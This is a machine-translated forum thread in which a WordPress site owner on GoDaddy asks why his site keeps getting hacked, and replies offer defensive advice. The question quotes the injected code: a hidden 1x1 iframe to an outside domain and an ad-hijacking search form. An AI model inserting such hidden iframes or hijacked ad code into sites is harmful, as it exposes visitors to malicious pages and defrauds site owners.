Сайт снова взломан

Окончательное обновление:

Последние несколько недель все было мирно, и я узнал гораздо больше о безопасности и рисках веб-сайтов. Вот моя версия истории -

Я использовал старую версию wordpress, и, вероятно, этот человек поймал меня в Google. Я думаю, это была атака по сценарию. Сложно сказать, как и когда безопасность была фактически взломана, но я обратил на это внимание 5 ноября 2009 г. Хотя в то время я принял некоторые меры безопасности (описанные ниже), всегда есть вероятность, что я пропустил смену паролей Wordpress, когда Я отформатировал свой рабочий компьютер.

Теперь я удалил с хостинга все ненужные скрипты php, сделал часть администрирования доступной только для моего IP, заблокировал определенный диапазон IP, принадлежащий Вьетнаму. Ежедневные бэкапы и прочее. Дело в том, что задействовано так много переменных, и очень сложно отслеживать все и вся. К этому нужно подготовить основной урок. :)

Я использую план общего хостинга от GoDaddy и запускаю веб-сайт WordPress. Мой сайт был впервые взломан 5 ноября 2009 года. В то время хакер заменены мои объявления с его собственными. Я думал, что это произошло из-за моей лени с охраной, но я ошибался.

Я отформатировал свой компьютер и снова все настроил. ESET NOD32 заменен на Microsoft Security Essentials. Обновился до последней версии WordPress. Поменял все пароли. Установите новую базу данных. И другие материалы, связанные с безопасностью, я читаю тут и там. Некоторое время все шло хорошо, пока сегодня мой сайт снова не взломали.

В прошлый раз парень поигрался с множеством файлов и специально изменил footer.php и все файлы, связанные с рекламой. Но на этот раз он просто пошел в нужное место и заменил его следующим кодом -

<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>

<form action="http://www.google.com/cse" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />

    <input type="hidden" name="ie" value="ISO-8859-1" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Search" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>

Похоже, этот человек не заинтересован в манипулировании базой данных и т. Д., А просто размещает код и быстро зарабатывает. Godaddy перенаправил мои журналы ftp и обнаружил несанкционированный доступ с IP-адреса 117.2.56.31. Этот IP принадлежит Вьетнаму, а также http://blackberryrss.com имеет некоторую связь с Вьетнамом.

У моей учетной записи нет доступа по SSH, и я подключаюсь к FTP с помощью FireFTP. Это был ответ GoDaddy в прошлый раз -

При просмотре вашей учетной записи мы обнаружили, что ваша учетная запись FTP была взломана либо из-за вредоносного ПО на вашем локальном компьютере, либо из-за слабого пароля FTP / хостинга.

Но я сменил все пароли, удалил учетные записи и т. Д., Но, похоже, ничего не работает. В данный момент я ничего не понимаю. Подскажите пожалуйста что делать? Как я могу предотвратить несанкционированный доступ к моей учетной записи ??????

Дополнительные детали:

Надежность пароля просто надежна, но не лучшая.
Я лично использую Windows XP SP3, брандмауэр Windows и т.д. После первой атаки я научился работать с учетной записью пользователя и избегать учетной записи администратора.
Когда я вижу журналы FTP для первой атаки, становится ясно, что человек все это делает вручную.

Имейте в виду, что FTP отправляет ваш пароль в ЧИСТОМ ТЕКСТЕ. Так что потенциал для компромисса определенно есть.

Еще одна вещь, которую следует учитывать, является ли ваш пароль FTP УНИКАЛЬНЫМ для вашего хостинга? Вы уверены, что больше нигде не используете его? Никаких других учетных записей, веб-сайтов и т. Д.?

Насколько безопасен ваш пароль EMAIL? Я был вовлечен в случаи, когда «слабым звеном» на самом деле был пароль EMAIL, а виновник просто отправлял «забытые пароли» на электронную почту и удалял доказательства из почтового ящика, в то время как все были слишком заняты, сосредоточившись на взломанном сервере, чтобы уведомление.

В голову пришло всего несколько вещей ... некоторые другие вещи, конечно же, были бы подходом социальной инженерии с вашим интернет-провайдером или какой-либо уязвимостью программного обеспечения на вашем сервере или в одном из пакетов вашего хостинга.

Есть и другие (очевидно), но это, как правило, «обычные подозреваемые».

ОБНОВИТЬ:

Основываясь на этой новой информации (о том, что хакер не использует FTP для изменения ваших файлов), я могу только предположить, что наиболее вероятной причиной, вероятно, является незащищенное веб-приложение.

Это не единственное, что может быть, но в подобных случаях наиболее вероятно.

Еще одна вещь, которую следует учитывать (и проверять), - это не оставил ли он себе какой-то «черный ход» для вашего приложения. Я припоминаю, как вы ранее упоминали, что ваш провайдер сказал, что он вошел через FTP. Неужели он зашел через FTP в первый раз и оставил себе черный ход?

Кроме того, это выстрел в темноте, но я лично был свидетелем взломанных ящиков, где хакер пришел только ОДИН раз, но оставил задание cron, которое продолжало изменять файлы и другое различное зло. Возможно ли, что хакер НЕ вернулся, а вы имеете дело с автоматическим скриптом? Просто что-нибудь, чтобы проверить, чувствуете ли вы, что исчерпали все другие возможности.

Наконец, есть ли у вас доступ к своим веб-журналам, системным журналам и т. Д.? Если да, то что они говорят? Они раскрывают какие-нибудь зацепки?

Вы можете захотеть прочитать Подробный анализ взлома WordPress. Еще один пост, в котором много информации о Взлом блога WordPress со ссылками. Сам WordPress имеет Вопросы-Ответы о том, что делать после взлома вашего блога.

WordPress - это строго целевое приложение только из-за его популярности. Борьба с хакерами этих сайтов - это работа на полную ставку. Судя по вашему описанию, похоже, что кто-то обнаружил, что WordPress использует его в полной мере. Похоже, вы пока делаете все правильно, но я думаю, что злоумышленник загружает файл на ваш сайт и атакует с этого направления. Первая ссылка, на которую я указал вам, содержит очень подробное описание этого и того, какие шаги были предприняты для противодействия этому.

В конце концов, вам, возможно, придется подумать о переходе с WordPress на другое приложение для ведения блогов. Удачи в защите и надеюсь, что это поможет некоторым.

Если вы не запускаете все FTP-сеансы через безопасный туннель (или, что еще лучше, используете sftp), этот пароль БУДЕТ обнаружен.

Наша стандартная практика - вообще не включать FTP. Если необходимо, мы разрешаем только анонимный ftp и сильно ограничиваем его известной областью.

Если требуется загрузка, мы запрещаем выводить каталог для загрузки.

Глупый вопрос, но - пробовали ли вы сменить пароль и вообще использовать другой компьютер? Возможно, на вашем компьютере есть регистратор нажатий клавиш.

Подозреваю здесь розыгрыш или, по крайней мере, целенаправленную атаку. Кто-нибудь из ваших знакомых готов разыграть такую шутку ..?

Выйдите из коробки, прежде чем стать слишком параноиком. Помогает.

ps: или, возможно, неправильно используемая тема wordpress. Или неправильные учетные данные для доступа к БД.

GoDaddy дает вам Доступ по SSH и вы можете подключиться к своей учетной записи с помощью Putty.exe на порту 22. После подключения вы можете использовать Putty для создания 2 прокси / туннелей на портах 20 и 21. Затем вы можете использовать ftp через защищенный туннель для доступа к своим файлам.

Или, что еще лучше, вы можете сделать то же самое намного проще, используя PSFTP.exe или вы можете подключиться к порту 22 с помощью клиента FileZilla.

Честно говоря, я бы попросил провайдера заблокировать этот IP-адрес на уровне брандмауэра. Если GoDaddy не хочет этого делать, то мне кажется, что они безответственные хостеры, которые не предпримут шагов для защиты ваших данных, и вам следует переключиться.

blackberryrss.com расположен в США, поэтому у вас есть рычаги воздействия, которыми вы можете воспользоваться:
DNS материал

Сообщите здесь идентификатор издателя, Google ОЧЕНЬ серьезно относится к мошенническим действиям в их сети AdSense. Сообщить о злоупотреблении Google AdSense

На самом деле, если честно, GoDaddy даже не должен пропускать его, потому что обратный DNS этого IP - это «localhost», что является ОГРОМНЫМ красным флагом. Только 1 IPv4-адрес должен разрешаться в localhost (конечно, при условии, что мы говорим только о стандартных IP-адресах), и это 127.0.0.1. DNS материал

Если копнуть еще глубже в кроличью нору, кажется, что bluehost размещает их сервер, так что позвоните им и посмотрите, что они хотят делать (если что-нибудь).

И у вас всегда есть возможность сообщить об этом в местные органы власти (получение доступа к сетям и компьютерам, к которым у вас нет прав или привилегий, является преступлением).

Ваш пароль FTP перехватывают, это часто случается с нашими сайтами, размещенными там.